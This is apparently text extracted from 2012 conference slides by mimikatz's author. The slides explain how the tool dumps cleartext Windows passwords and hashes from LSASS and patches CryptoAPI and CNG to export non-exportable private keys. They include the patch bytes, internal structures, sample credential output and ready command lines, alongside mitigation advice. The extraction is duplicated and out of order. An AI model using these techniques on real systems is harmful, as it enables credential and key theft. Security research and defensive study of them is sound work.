mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa tspkg mimikatz sekurlsa tspkg
because sometimes hash is not enoughhellip
because sometimes hash is not enoughhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 10 10
mimikatz sekurlsa tspkg what is it
mimikatz sekurlsa tspkg what is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquos experience ndash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation) ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquos experience ndash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation) ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11 11
mimikatz sekurlsa tspkg questions
mimikatz sekurlsa tspkg questions
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12 12
mimikatz sekurlsa tspkg symbols amp theory
mimikatz sekurlsa tspkg symbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13 13
kdgt x tspkgclear 75016d1c tspkgTSObtainClearCreds = ltno type informationgt kdgt x tspkgpassword 75011b68 tspkgTSDuplicatePassword = ltno type informationgt 75011cd4 tspkgTSHidePassword = ltno type informationgt 750195ee tspkgTSRevealPassword = ltno type informationgt 75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgt kdgt x tspkglocate 7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkg workflow
mimikatz sekurlsa tspkg workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
KIWI_TS_PRIMARKIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0 LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64 BYTE unk0[108] elif defined _M_IX86 BYTE unk0[64] endif LUID LocallyUniqueIdentifier PVOID unk1 PVOID unk2 PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIAL
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
mimikatz sekurlsa tspkg demo time
mimikatz sekurlsa tspkg demo time
sekurlsatspkg
sekurlsatspkg
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15 15
mimikatz sekurlsa wdigest mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
because clear text password over httphttps is not cool
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16 16
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
